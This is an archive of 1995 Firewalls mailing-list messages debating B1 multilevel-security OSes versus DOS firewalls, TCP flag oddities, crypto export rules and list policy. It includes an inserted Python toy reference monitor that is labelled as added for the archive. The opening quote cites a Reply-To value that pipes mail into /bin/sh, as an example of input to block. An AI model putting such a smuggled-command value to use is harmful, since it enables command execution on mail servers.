> blocks out "| sed '1,/^$/d' | /bin/sh" as a Reply-To address,
> and whether the trusted FTP service on the firewall binds ftp-data
> when it talks to the inside, and so on. Those details are reflected
> not in formal methods, but in niggling, ugly, policy reflected in
> lines of code.

Of course, you still have to install a firewall of choice on the B1 host. B1 protects the firewall host itself from attack. I think that that is in and of itself enough reason to implement firewalls on B1 servers.

Now Padgett mentions using DOS to kick off a machine-model piece of code that uses the protection of the MMU just like UNIX, NT, and other virtual memory OS's do. I'm sure that you can indeed build a secure firewall in that fashion, and with sufficient work could get it evaluated against someone's criteria. Consider what will have to be done. You'll need some way to schedule services; maybe interrupts will do? You'll need some way to enforce separation of kernel from services; maybe using a protect mode in the CPU will do. But that only protects memory; the access to devices and files is still wide open. You'll have to have some way of determining when one of the services modifies something upon which the kernel relies... whew! I'm getting tired thinking about it.

But this exhausting work has already been done! We have B1 secure versions of operating systems that use the hardware protection mechanisms to separate processes from one another and the kernel from processes in general; B1 policy to protect files; auditing to record accesses and detect failures. They have been through rigorous evaluations. Now vendors will cook up their own solutions, and firewalls are in their infancy, but we should build on the work that has been done when it comes to operating systems.

Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Fri Aug 11 09:56:33 1995
Date: Fri, 11 Aug 95 11:36:00 EST
Message-Id: <9508111136.AA23652@herne.newsedge.com>
From: "Chris Brenton"
Subject: Re: DOS Firewall (was Re: Multilevel Security...)

In reply to:
>
>I don't work have any connection to the company but I have gotten info
>from them for evaluation. The company Network-1 offers the product for
>download for evaluation ( you have to call to get a key to access the
>software) http://www.iu.new/n1/home.html

The URL you have reached: http://www.iu.new/n1/home.html
is not in service, please check the address and surf again.
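As an added worked example of the MAC barriers in Mark Riggins' "Typical Setup" diagrams above (toy code written for this archive, not code from the list, from any B1 product, or from the Type Enforcement model): a tiny reference monitor that labels subjects and objects with his levels 0, 1 and 2, lets a higher level read the levels below it but refuses any write that would cross a barrier, and records every decision. The file names and the scenario of a hijacked proxy are constructed; the rule that writes are confined to the subject's own level (so write-up is refused as well as write-down) is an assumption of this toy, since the post only discusses writes downward.

```python
"""Toy reference monitor for the layered MLS setups described in Mark
Riggins' post (added illustration; not code from the list or from any
B1 product). Level numbers follow his diagrams: 0 is the TCB, 1 the
proxy code and configuration, 2 the running proxies and servers."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

TCB = 0          # kernel, audit trails, config files, cron scripts, devices
PROXY_CODE = 1   # proxy binaries and their configuration (Setup 2)
PROXY_RUN = 2    # the running proxies, web servers etc. (Setup 2)

AuditEntry = Tuple[str, str, int, str, int, str]


@dataclass
class Obj:
    """A file or device carrying a mandatory (MAC) label."""
    name: str
    level: int
    contents: str = ""


@dataclass
class Subject:
    """A process carrying the label it was started at. Whether it runs as
    root is irrelevant to the monitor, which is the point of the post."""
    name: str
    level: int


class ReferenceMonitor:
    """Mandatory rule from the post: a higher level may rely on (read) the
    levels below it but cannot write to them. Assumption of this toy: writes
    are permitted only at the subject's own level, so neither write-down nor
    write-up crosses a MAC barrier. Every decision is recorded so the
    TCB-level audit trail shows what a misbehaving proxy tried to do."""

    def __init__(self) -> None:
        self.audit: List[AuditEntry] = []

    def read(self, subj: Subject, obj: Obj) -> Optional[str]:
        allowed = obj.level <= subj.level
        self._record("read", subj, obj, allowed)
        return obj.contents if allowed else None

    def write(self, subj: Subject, obj: Obj, data: str) -> bool:
        allowed = obj.level == subj.level
        self._record("write", subj, obj, allowed)
        if allowed:
            obj.contents = data
        return allowed

    def denials(self) -> List[AuditEntry]:
        return [e for e in self.audit if e[-1] == "DENY"]

    def _record(self, op: str, subj: Subject, obj: Obj, allowed: bool) -> None:
        self.audit.append((op, subj.name, subj.level, obj.name, obj.level,
                           "ALLOW" if allowed else "DENY"))


def hijacked_proxy_scenario():
    """Constructed scenario for Setup 2: an attacker has taken over the
    running ftp proxy (level 2) and holds uid 0 inside it. Returns the
    outcome of each attempted action plus the monitor with its audit trail."""
    rm = ReferenceMonitor()
    cfg = Obj("proxy-ftp.conf", PROXY_CODE, "allow-from 10.0.0.0/8")
    crontab = Obj("/etc/crontab", TCB, "0 3 * * * /sbin/rotate-logs")
    state = Obj("/var/proxy/ftp.state", PROXY_RUN, "")
    attacker = Subject("proxy-ftp (hijacked, uid 0)", PROXY_RUN)
    outcome = {
        # relying on the lower level is fine: the proxy may read its config
        "read_config": rm.read(attacker, cfg) is not None,
        # but cannot loosen it: that is a write down through a MAC barrier
        "rewrite_config": rm.write(attacker, cfg, "allow-from 0.0.0.0/0"),
        # and cannot touch the TCB's cron table, root or not
        "alter_crontab": rm.write(attacker, crontab, "tampered"),
        # scratch data at its own level is the most it can damage
        "write_own_state": rm.write(attacker, state, "session table"),
    }
    return outcome, rm


def admin_scenario():
    """Constructed scenario: the proxy administrator works at level 1 and
    can maintain proxy configuration without being able to modify the TCB."""
    rm = ReferenceMonitor()
    cfg = Obj("proxy-ftp.conf", PROXY_CODE, "allow-from 10.0.0.0/8")
    crontab = Obj("/etc/crontab", TCB, "0 3 * * * /sbin/rotate-logs")
    admin = Subject("proxy-admin", PROXY_CODE)
    return {
        "edit_config": rm.write(admin, cfg, "allow-from 10.1.0.0/16"),
        "alter_crontab": rm.write(admin, crontab, "tampered"),
    }


if __name__ == "__main__":
    outcome, monitor = hijacked_proxy_scenario()
    for action, allowed in outcome.items():
        print(f"{action:16s} {'ALLOW' if allowed else 'DENY'}")
    for entry in monitor.denials():
        print("audit:", entry)
```

The two scenarios are the post's two claims in miniature: a compromised proxy at level 2 can only damage its own level (the "no more serious than a login at level 1" point from Setup 1, shifted up one level in Setup 2), while administration of the proxy configuration happens at level 1 without any write path into the TCB. The denials land in an audit trail the proxy itself cannot reach, which is what makes "securely monitor the operation of the proxy" possible.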
From firewalls-owner Fri Aug 11 10:00:50 1995
From: kurz@pc08.muc.telenet.de
Date: Fri, 11 Aug 95 18:07:38 CET
Message-Id: <9507118081.AA808189658@pc08.muc.telenet.de>
To: firewalls@greatcircle.com
Subject: Which firewall has best management?

Listening to the discussions for a while, I believe I've got a good impression of most technical features for standalone firewalls. But imagine the situation in a network consisting of more than one class B address. The network has connections to partner companies and other associated sites. Several routers are used to implement these. Different policies for the attached networks are defined.

Is subdividing the net via firewalls a good idea? Which firewalls have the best management to accomplish this? A multipoint-of-access-and-control system would be good, where you can specify administrators and let them administrate different parts of the whole net.

As performance might also be a problem, I tend towards an intelligent packet filtering firewall. Firewall-1 sounds good, because you can also manage the routers with that. An application gateway would still be useful for Internet access, maybe as an additional offer to the users. After slowly migrating all Internet use to the application gateway, one could apply stricter and stricter rules to the Internet router/packet filter.

Any ideas?

Michaela Kurz
c/o Telenet GmbH Kommunikationssysteme
Ungererstr. 75
80805 Munich
Germany
Voice: +49 89 36073-130  Fax: -125
E-Mail: mkurz@telenet.de

From firewalls-owner Fri Aug 11 10:09:44 1995
Subject: TCP Header Flags
To: firewalls@greatcircle.com
Date: Fri, 11 Aug 1995 12:25:38 -0400 (EDT)
From: Carsten Schafer
Cc: Carsten Schafer
Message-ID: <9508111225.aa03131@rosie.software.group.com>

I have recently been getting lots of packets with the SYN bit set and a combination of PUSH, URG and RST. Our packet filter seems to throw away anything with a SYN bit set. I guess I'm wondering which packets are considered connection requests by TCP when the packet contains a SYN bit. Are packets containing the SYN flag and no others considered connection requests? Most of the packets with the other flags set seem to be in response to HTTP requests.

Dazed and Confused
Carsten

===========================================================================
|| Carsten Schafer                  Email: carsten@software.group.com    ||
|| The Software Group               Phone: (705) 725-9999                ||
|| 642 Welham Road                  Fax:   (705) 725-9666                ||
|| Barrie, Ontario, Canada L4M 6E7  Telepathy: gumby#green#beer#german   ||
|| WWW: http://www.group.com/       FTP: ftp.group.com                   ||
===========================================================================

From firewalls-owner Fri Aug 11 10:31:01 1995
From: Ruiyuan_Jiang/Advantage_KBS_at_LotusXchg@njcorp.akbs.com
Date: Fri, 11 Aug 95 11:43:00 EST
Message-Id: <9507118081.AA808166647@njcorp.akbs.com>
To: Chuck Dean
Cc: Firewalls@GreatCircle.com
Subject: Re: DOS Firewall (was Re: Multilevel Security...)

Chuck Dean writes....
>>Mark Riggins writes....
>>Plus you're handing the security of your organization over to an
>>unevaluated black box based on someone's idea of what security means.
>>Has that idea seen the light of peer review? Or can anyone order one
>>of these, do some disassembly and find an easy hole? Plus DOS may be
>>listening to more than you think if it has a tcp/ip stack. Do you
>>have source to the tcp/ip code?
>I don't work have any connection to the company but I have gotten info
>from them for evaluation. The company Network-1 offers the product
>for download for evaluation ( you have to call to get a key to
>access the software) http://www.iu.new/n1/home.html
>The product appears to do packet filtering, with a gui front end.
>Replaces DOS when it loads and does not have or require a TCP/IP
>stack in DOS. Their point being that if someone managed to crash
>the firewall they are stuck in a dumb uncommunicative DOS box.
>Requires min 486-50.
>Would like to hear from someone who has actually used this system.

Since MS-DOS is not multi-tasking, when you try to read the firewall loggings, if the product provides them, I think you need to down the firewall, or maybe it can mail the loggings to someone?

I have a cc:Mail SMTP mail gateway and it runs under MS-DOS. It provides that
1. it mails loggings to someone, i.e. the administrator
2. if you don't set it up to mail someone and you want to check the loggings, then you need to down the mail gateway and check the loggings under MS-DOS, i.e. with the MS-DOS editor.

Ruiyuan Jiang
(908) 287-2236
rjiang@akbs.com

From firewalls-owner Fri Aug 11 10:48:04 1995
Message-Id: <9508111538.AA15941@ig1.att.att.com>
From: mdr@vodka.sse.att.com
Subject: Re: Multilevel Security is good for firewalls
To: baumann@proton.llumc.edu (Michael Baumann)
Date: Fri, 11 Aug 1995 11:40:18 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Michael Baumann" at Aug 11, 95 06:46:11 am

Michael Baumann writes:
> > > > And if your software breaks, you also have no protection of the
> > system from the user. And no idea what happened to
> > the system or how it happened or that it happened.
> True. So? I have the same problem debugging my Multi-Threaded realtime
> applications running on my embedded controllers. It just takes
> skill to recognize the problem.

So your security is toast. Why does everyone keep assuming that when DOS breaks it dies? There are some things worse than death for firewalls--like living under the control of an attacker.

> > Plus you're handing the security of your organization over to an
> > unevaluated black box based on someone's idea of what security means.
> > Has that idea seen the light of peer review?
> Yes, For at least one. TAMU calls it Drawbridge. Surprise.

Sorry, must have missed it. When was it evaluated, and against what criteria, and by whom? I'd like to read their design papers and review outcome and such. Could be interesting stuff.

> > I can just as easily run B1 unix w/o network daemons if all I want to
> > live w/o proxies. If you proxy in DOS or windows, then the OS has
> > absolutely no protection from software errors.
> Why the *expletive* does everyone assume proxies?
> Not every security policy requires them.

Even if you don't have proxies, you still have a program of some sort that is making decisions per packet. If that program goes south of the border, is there any safety net underneath? If someone gains control of the program, how much damage can they do? If it's running on DOS, does it boot off a writable hard disk? Burning ROMs makes a lot of sense here if you stick with this approach, but there has to be some configuration data that is modifiable somewhere. Maybe a read-only floppy would be a good place to put it; then you could do the admin on another box.
But once I've broken your application, I'll just break it again if you reboot. You've got no means to tell that I've broken it.

The point that I'm trying to make is that a B1 OS gives you one additional layer of encapsulation. Now for kernel implemented stuff like IP, in reality higher levels like B3 are better because they require a modular kernel that can keep track of itself. But B1 does well for proxies and server daemons, and *ADDS* to the functionality of the firewall. Now I have a firewall that is safe for proxies, and all of the other services that an OS provides will come in handy.

Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Fri Aug 11 11:06:20 1995
Date: Fri, 11 Aug 95 12:54:23 -0400
Message-Id: <9508111654.AA16775@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "peter@ris1.nmti.com"@UVS1.dnet.mmc.com
Cc: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: To OS or 0 2 OS

Peter rites:
>The only thing any UNIX uses the BIOS for is to load itself into memory. The
>BIOS interface is *so* broken that no high performance operating system uses
>it for anything else. NT doesn't use the BIOS ... it has its own drivers.
>OS/2 will use the BIOS but prefers not to.

Is not broken, it does what it was designed to do very well (well, a "100% compatible" one will).

The BIOS has two major limitations:
1) slow access
2) fixed "real" (segmented) addressing

The first is a hardware problem that is a function of the interface between the ROM chip and the memory bus (why shadowing is popular). Is not a ROM characteristic per se, rather is a function of the implementation.

The second is more of a problem and descends from the fact that when an iapx chip first has power applied, it is in "real" mode: 1 Mb segmented memory model. Further, the CS register initializes to FFFFh and the IP register to 0000h. This fixes where in memory the ROM *must* be, since whatever is at FFFF:0000 WILL be executed (always an intersegment jump). In the original IBM spec, the ROM date/id fills the rest of that paragraph.

Bottom line: to do anything *fast*, it must be done in RAM, and to go to a flat memory model, the ROM code must be moved, and then it will not work (well, QEMM "stealth" does some fancy swapping). NT/Unix/Netware require a flat memory model so *must* use their own drivers. Not a choice.

Now if someone wanted to, a self-relocating, protected mode switching, flat memory model BIOS could be written. AFAIK no-one has.

Warmly,
Padgett

From firewalls-owner Fri Aug 11 11:13:08 1995
Date: Fri, 11 Aug 1995 09:58:30 -0800
To: se@adv.sbc.sony.co.jp (Steve England), firewalls@greatcircle.com
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Attack, Attack, Attack

At 11:48 AM 8/11/95, Steve England wrote:
>How do the rest of us get to know these ? Whilst i'm not (quite) asking for
>"how do i break into site X" i believe there is a lot that can be shared
>by the above said people to aid us *newer* people - can we share this
>kind of info within this list (Brent ?) otherwise arent all we are doing
>is practising another form of security through obscurity ? ie. the few that
>know versus the most that dont ?

From the "Policies" section of the "Welcome to the Firewalls mailing list" document (to get a copy of the current document, send the command "info firewalls" in the body of a message to "Majordomo@GreatCircle.COM"):

    Code for cracking programs (programs designed to help break into
    another system) should not be posted to the Firewalls mailing list.

So, if folks want to talk about _how_ to break in to systems, that's fine; as long as nobody posts code. Now, we could argue over exactly what I mean by "code", but I'd rather not. Use some judgement; if I (or others) disagree with your judgement, believe me, you'll hear about it! :-)

One thing to keep in mind regarding this discussion: it's been my experience that the folks who are good at securing systems usually are NOT that good at breaking into them, and vice versa. The two activities require significantly different attitudes and skills in order to be successful. Sure, expert defenders can sometimes use their knowledge of a particular bug or problem to figure out how to exploit that particular bug or problem; they're usually not that good at discovering new bugs or problems, though. And sure, expert attackers can sometimes use their knowledge of a particular bug or problem to figure out how to fix that particular bug or problem; they're usually not very good at generating architectural fixes to address whole classes of problems, though. "Think like a cracker" is an interesting exercise, but it's just that: an exercise.

-Brent

--
Brent Chapman         | Great Circle Associates | For Firewalls Tutorial info:
Brent@GreatCircle.COM | 1057 West Dana Street   | Tutorial-Info@GreatCircle.COM
+1 415 962 0841       | Mountain View, CA 94041 | http://www.greatcircle.com

From firewalls-owner Fri Aug 11 11:35:26 1995
Date: Fri, 11 Aug 1995 11:11:38 -0400
From: Ted Doty
Message-Id: <199508111511.LAA09748@kgbvax.network.com>
To: MAHAJAN_VIVEK@tandem.com, firewalls@greatcircle.com
Subject: Re: Encrypted data across national boundaries???
In-Reply-To: Mail from 'MAHAJAN_VIVEK@tandem.com' dated: 10 Aug 95 17:06:00 +1700 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 10 Aug 95 17:06:00 +1700, MAHAJAN_VIVEK@tandem.com wrote: > If there is a need to send data > to about 50 countries (including places such as Russia/China) is there any > kind of encryption solution either hardware or software that can be used > across the board? The data will originate from London for Europe, from > Singapore and Australia for Asia, and from USA for North and South America. As I understand it, The People's Republic of China is now off the "bad guy" list, so you can export crypto to it. Not sure what the banking standard is there, but I'd be kind of surprised if they don't do DES. Note that this still falls under ITAR, so you (probably) need something like RC4 (or NSC's cipher NSC1) for non-banking use. > According to what I have looked into there is no solution that will allow a > standard acceptable encrption method without violating export laws of the > countries from which the data originates. Even if there a standard for > North and South America, a standard for Europe, and a standard for Asia and > Australia that would be acceptable. There doesn't seem to be a single cipher that can be used everywhere (except the short list: Libia, North Korea, etc), EXCEPT for banks. This is mostly the ITAR, but other places (France for sure; rumors have it that Australia also restricts crypto ... can anyone confirm ot deny this?) also have their own restrictions on crypto use ("Damn it ... that's against the First Amendment! It's downright un-american!" ;). The best you can probably do is use a cipher-agile encryption box that has enough variety to be able to satisfy the ITAR and local regulations. 
-- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Fri Aug 11 11:36:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04001 for firewalls-outgoing; Fri, 11 Aug 1995 10:18:00 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA03958 for ; Fri, 11 Aug 1995 10:17:53 -0700 Received: from gateway.damark.com(204.17.145.230) by miles via smap (V1.3) id sma003938; Fri Aug 11 10:17:12 1995 Received: by gateway.damark.com; id MAA09613; Fri, 11 Aug 1995 12:15:43 -0500 Received: from sco.damark.com(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme009606; Fri, 11 Aug 95 12:15:23 -0500 Received: by damark.com (5.65/1.2-eef) id AA05210; Fri, 11 Aug 95 12:13:40 -0500 Message-Id: <9508111713.AA05210@damark.com> From: "william.wells" To: FIREWALLS Subject: SunOS vs Solaris 2 vs Intel/BSD for firewalls Date: Fri, 11 Aug 95 12:12:00 +6C Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>> Previously written <<< >How do they administer the system in mulituser mode? Presumably adding >users and accounts and such would be disallowed. Also adding undesired >services such as a telnetd or packet grabber would be disallowed. You only set immutable on files you want it on. Devices and special files get default immutability at certain run levels but tagging it on a file is the admin's option. So if you set all the files in /etc/ as immutable then, sure, administering the machine would be complicated. 
>If I can affect any file that root runs during single user mode, I can >still hack the system, I just have to wait for a re-boot. This is a good point. BUT I'd like you to consider the fact that the immutable files feature has closed off a whole category of well-known weaknesses, and has given the administrator a useful tool to help build more solid systems. It's not too intrusive and it's not too awkward, and it's easy to understand and I suspect that I will find several cases in the next few years where I'll be glad to have it. >>> Newly written <<< This sounds similar to the protection used by another system I used to work on. This system had a protected system master which was not accessed like normal files and was hence, not writable unless you used special commands which worked only from the console . When the system booted, this protected system master was copied (again, into a special "system" file structure, and the copy used. Because the running system was not a normal file system, no normal file commands works; only commands which could be used from the console. By keeping the master (which could be on a read-only media) separate from the running version, rebooting destroyed any changes which systems personnel "threw in" (talk about enforced prevention of "long-term 'temporary'" changes and forced version control). Immutable files seem like the address the same concerns; keeping people from modifying files which they aren't supposed to. Its about time.... (A nice by-product of this was that you could put the system master on tape and boot the tape. Very handy if you lost your system disk.) William Wells Manager, Technical Support Damark International, Inc. 
normal disclaimers apply

From firewalls-owner Fri Aug 11 11:37:30 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06828 for firewalls-outgoing; Fri, 11 Aug 1995 10:57:01 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06752 for ; Fri, 11 Aug 1995 10:56:48 -0700
Received: from academic.csubak.edu(136.168.1.4) by miles via smap (V1.3) id sma006734; Fri Aug 11 10:56:13 1995
Received: by academic.csubak.edu (MX V4.1 VAX) id 58; Fri, 11 Aug 1995 10:54:15 PST
Date: Fri, 11 Aug 1995 10:54:14 PST
From: ED RAMON
To: firewalls@greatcircle.com
Message-ID: <00994B61.42E44F20.58@academic.csubak.edu>
Subject: How do you get off this list?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Can anyone give me the exact command to get off of this list?

Thanks
Ed

From firewalls-owner Fri Aug 11 11:38:38 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05464 for firewalls-outgoing; Fri, 11 Aug 1995 10:39:32 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05383 for ; Fri, 11 Aug 1995 10:39:21 -0700
Received: from di.disclosure.com(205.156.194.1) by miles via smap (V1.3) id sma005340; Fri Aug 11 10:38:28 1995
Received: by Disclosure.COM (4.1/SMI-4.1) id AA12328; Fri, 11 Aug 95 13:40:07 EDT
Date: Fri, 11 Aug 1995 13:40:06 -0400 (EDT)
From: Scott Barman
To: Chris Brenton
Cc: firewalls@GreatCircle.COM
Subject: Re: DOS Firewall (was Re: Multilevel Security...)
In-Reply-To: <9508111136.AA23652@herne.newsedge.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 11 Aug 1995, Chris Brenton wrote:

> In reply to:
> >
> >I don't have any connection to the company but I have gotten info
> >from them for evaluation. The company Network-1 offers the product for
> >download for evaluation ( you have to call to get a key to access the
> >software) http://www.iu.new/n1/home.html
>
> The URL you have reached: http://www.iu.new/n1/home.html
> is not in service, please check the address and surf again.

Gee... and I figured out that if you s/new/net/ you actually may get somewhere! But that takes com... never mind!! :-)

scott barman
-- 
scott barman                 DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com                     and I speak only for myself.
barman@ix.netcom.com
"Micro$oft and Windoze/NT will be the cause of the de-evolution of network
security just as the original PC and BASIC was the cause of the de-evolution
of programming."

From firewalls-owner Fri Aug 11 11:39:52 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05575 for firewalls-outgoing; Fri, 11 Aug 1995 10:40:36 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05490 for ; Fri, 11 Aug 1995 10:40:24 -0700
Received: from kgbvax.network.com(129.191.202.58) by miles via smap (V1.3) id sma005467; Fri Aug 11 10:40:00 1995
Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id MAA09886; Fri, 11 Aug 1995 12:36:31 -0400
Date: Fri, 11 Aug 1995 12:36:31 -0400
From: Ted Doty
Message-Id: <199508111636.MAA09886@kgbvax.network.com>
To: padgett@tccslr.dnet.mmc.com, firewalls@greatcircle.com
Subject: Re: Encrypted data across national boundaries
In-Reply-To: Mail from 'padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)' dated: Fri, 11 Aug 95 09:02:23 -0400
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 11 Aug 95 09:02:23 -0400, padgett@tccslr.dnet.mmc.com wrote:

Consider PGP. For an American business communicating with a site in France ITAR says that the US company may not send the PGP software to the recipient. (a-1) so they will have to tell the French site to get their own (PGP 2.62i).
- am not sure if this would be a violation of (a-iii), I don't get paid for this you know 8*).

Actually, if the site in France was a subsidiary (at least 51% US - or presumably Canadian) owned, ITAR would let them send PGP. Whether the French government would let the subsidiary USE it is a different matter.

If US company's MIS called the French company's MIS and told them to download PGP (say, from Finland), probably both MIS departments would get an all-expenses vacation in the local prison. The US guys for violation of ITAR, the French for practicing encryption without a license.

If the company downloaded the domestic copy from MIT instead of buying it from ViaCrypt, they are in violation of (c-1). Not to mention in violation of patents held by RSA Data Security, Inc. ;-)

Bottom line: to be responsible, each area must be checked off (let me know if I missed something) and this just covers the basics - nothing to do with *what* messages are sent. Is not as simple as it looks.

Padgett got the meta-issues exactly right. How the laws apply to someone using encryption (legally) in both the sending and receiving countries, but not in the country of transit is a mystery to me. Welcome to the Internet.

OBTW, look at the brand new RFCs on Internet standard encryption. RFC #s 1825-1829.

-- 
- Ted
--------------------------------------------------------------------------
Ted Doty, Network Systems Corporation    | phone: +1 301 596-2270
8965 Guilford Road, Suite 250            | fax: +1 410 381-3320
Columbia, MD, 21046 USA                  | voice mail: (800) 233-1485
--------------------------------------------------------------------------
The opinion expressed in this message is fictitious. Any resemblance to
real opinions, living or dead, is purely coincidental.
From firewalls-owner Fri Aug 11 11:40:56 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06730 for firewalls-outgoing; Fri, 11 Aug 1995 10:55:53 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06698 for ; Fri, 11 Aug 1995 10:55:48 -0700
Received: from proton.llumc.edu(143.197.200.1) by miles via smap (V1.3) id sma006671; Fri Aug 11 10:55:31 1995
Received: from mycroft.llumc.edu (mycroft.llumc.edu [143.197.200.18]) by proton.llumc.edu (8.6.12/8.6.9) with SMTP id KAA08777; Fri, 11 Aug 1995 10:54:17 -0700
Date: Fri, 11 Aug 1995 10:54:16 -0700 (PDT)
From: Michael Baumann
To: mdr@vodka.sse.att.com
cc: firewalls@greatcircle.com
Subject: Re: Multilevel Security is good for firewalls
In-Reply-To: <9508111538.AA15922@ig1.att.att.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 11 Aug 1995 mdr@vodka.sse.att.com wrote:

> > Michael Baumann writes:
> >
> > > So your security is toast.
>
> Why does everyone keep assuming that
> when DOS breaks it dies? There are some things worse than death for
> firewalls--like living under the control of an attacker.

If the single application dies.. it stops forwarding. This is the point. The important thing to remember is that with DOS, you have but one program running. If your filter is sick, it does not filter.

>
> > > I can just as easily run B1 unix w/o network daemons if all I want to
> > > live w/o proxies. If you proxy in DOS or windows, then the OS has
> > > absolutely no protection from software errors.
> > Why the *expletive* does everyone assume proxies?
> > Not every security policy requires them.
>
> Even if you don't have proxies, you still have a program of some sort
> that is making decisions per packet. If that program goes south of
> the border is there any safety net underneath?

Yes.. if that program goes south. It does not forward.
> If someone gains control of the program how much damage can they do?

Highly, *highly* unlikely.

> If it's running on DOS does it boot off a writable hard disk? Burning
> ROMs makes a lot of sense here if you stick with this approach, but
> there has to be some configuration data that is modifiable somewhere.
> Maybe a read-only floppy would be a good place to put it, then you
> could do the admin on another box. But once I've broken your
> application, I'll just break it again if you reboot. You've got no
> means to tell that I've broken it.

Drawbridge can be configured in a number of ways.
1) Do not listen to either interface (no external management) and boot from read-only floppy.
2) Listen to the inside only, outside only, both. Encrypted or not.
The filter tables are compiled.. and can be compiled on any machine you have a C compiler for.

> The point that I'm trying to make is that a B1 OS gives you one additional
> layer of encapsulation. Now for kernel implemented stuff like IP, in
> reality higher levels like B3 are better because they require a
> modular kernel that can keep track of itself. But B1 does well for
> proxies and server daemons, and *ADDS* to the functionality of the
> firewall. Now I have a firewall that is safe for proxies, and all of
> the other services that an OS provides will come in handy.

Granted what you say may be true.. But for *most* organizations, that would be major overkill. Just how much will it add to the cost of a machine to get that B1 cert. ? And once you get it.. does it not lose that certification when it is installed somewhere else? Since what I want to do will not exactly be what you want to do, do you not have to certify the machine as configured, and then *ONLY* that certification holds? I seem to recall that thread being mentioned here. If I am wrong, I most humbly apologize.

Michael Baumann
Electus Technology Inc. / Loma Linda University Medical Center
San Bernardino, California.
(909)799-8308 |Internet: baumann@llumc.edu

From firewalls-owner Fri Aug 11 11:41:57 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07398 for firewalls-outgoing; Fri, 11 Aug 1995 11:06:05 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07354 for ; Fri, 11 Aug 1995 11:05:58 -0700
Message-Id: <199508111805.LAA07354@miles.greatcircle.com>
Received: from cheops.anu.edu.au(150.203.76.24) by miles via smap (V1.3) id sma007343; Fri Aug 11 11:05:47 1995
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA269494276; Sat, 12 Aug 1995 04:04:36 +1000
From: Darren Reed
Subject: Re: TCP Header Flags
To: carsten@group.com (Carsten Schafer)
Date: Sat, 12 Aug 1995 04:04:36 +1000 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: <9508111225.aa03131@rosie.software.group.com> from "Carsten Schafer" at Aug 11, 95 12:25:38 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1047
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Carsten Schafer, sie said:
>
> I have recently been getting lots of packets with the SYN bit set
> and a combination of PUSH, URG and RST. Our packet filter seems
> to throw away anything with a SYN bit set. I guess I'm wondering
> which packets are considered connection requests by TCP when the packet
> contains a SYN bit. Are packets containing the SYN flag and no others
> considered connection requests? Most of the packets with the other flags
> set seem to be in response to HTTP requests.

These don't occur in the normal way of things on the Internet, or at least not as far as I am aware. They are effective because Unix kernels seem to delight in ignoring other bits (URG, PUSH, RST and even some FIN) if the SYN bit is set. This can have some impact for packet filtering...

I can't find anything describing what should happen here, nor does it seem to be documented, other than to imply if they're there, ignore them.
I asked on the tcp-ip mailing list but no response (must be almost dead now...).

darren

From firewalls-owner Fri Aug 11 11:42:57 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08600 for firewalls-outgoing; Fri, 11 Aug 1995 11:26:18 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08592 for ; Fri, 11 Aug 1995 11:26:15 -0700
Received: from wet-string.avian.org(199.103.168.126) by miles via smap (V1.3) id sma008589; Fri Aug 11 11:25:34 1995
Received: (from hobbit@localhost) by narq.avian.org (8.6.12/_H*) id NAA12433 for firewalls@greatcircle.com; Fri, 11 Aug 1995 13:25:39 -0400
Date: Fri, 11 Aug 1995 13:25:39 -0400
From: *Hobbit*
Message-Id: <199508111725.NAA12433@narq.avian.org>
To: firewalls@greatcircle.com
Subject: klaxon
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

